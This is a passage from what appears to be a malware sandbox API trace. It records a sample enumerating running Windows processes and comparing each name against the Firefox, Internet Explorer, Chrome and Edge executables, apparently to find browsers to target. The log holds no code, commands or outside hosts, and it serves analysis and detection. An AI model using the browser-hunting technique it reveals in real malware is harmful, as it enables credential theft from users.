lpString2="chrome.exe") returned 1 [0229.406] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.406] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.407] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0229.407] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0229.407] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0229.407] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.407] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0229.407] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0229.407] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0229.407] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0229.408] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.408] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.408] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.408] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.408] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.408] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.408] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.409] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.409] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.409] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.409] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.409] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.409] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.409] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.409] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.409] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.409] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.410] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.410] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.410] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.410] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.410] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.410] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.410] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.410] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.410] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.410] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0229.411] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0229.411] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0229.411] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0229.411] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.411] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.411] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.411] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.411] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.411] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.411] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.412] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.412] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.412] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.412] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.412] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.413] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0229.413] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0229.413] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0229.413] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.413] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0229.413] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0229.413] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0229.413] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.414] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0229.414] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0229.414] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0229.414] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.414] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.414] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.414] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.414] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.414] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.414] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.415] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0229.415] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0229.415] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0229.415] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.415] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0229.415] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0229.415] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0229.415] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0229.415] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.415] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0229.416] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0229.416] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0229.416] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0229.416] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0229.416] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0229.416] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0229.416] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0229.416] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0229.417] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0229.417] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0229.417] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0229.417] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0229.418] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0229.418] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0229.418] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0229.418] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0229.418] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0229.418] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0229.418] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0229.418] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0229.419] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0229.419] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0229.419] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0229.419] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0229.419] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0229.419] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0229.419] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0229.419] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0229.420] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0229.420] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0229.420] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0229.420] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.420] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0229.420] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0229.420] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0229.420] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0229.420] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.420] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0229.421] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0229.421] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0229.421] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0229.421] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.421] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0229.421] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0229.421] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0229.421] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0229.422] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.422] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0229.422] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0229.422] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0229.422] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0229.422] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.422] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0229.423] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0229.423] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0229.423] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0229.423] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.423] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0229.423] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0229.423] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0229.423] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0229.423] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.423] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0229.424] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0229.424] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0229.424] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0229.424] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.424] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0229.424] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0229.425] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0229.425] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0229.425] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.425] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0229.425] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0229.425] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0229.425] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0229.425] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.425] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0229.426] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0229.426] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0229.426] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0229.426] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.426] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0229.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0229.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0229.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0229.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.426] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0229.427] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0229.427] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0229.427] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0229.427] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.427] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.427] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0229.427] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0229.427] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0229.427] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.427] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.428] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.428] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.428] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.428] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.428] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0229.429] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0229.429] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0229.429] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0229.429] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.429] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.429] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.429] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.429] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.429] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.429] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, 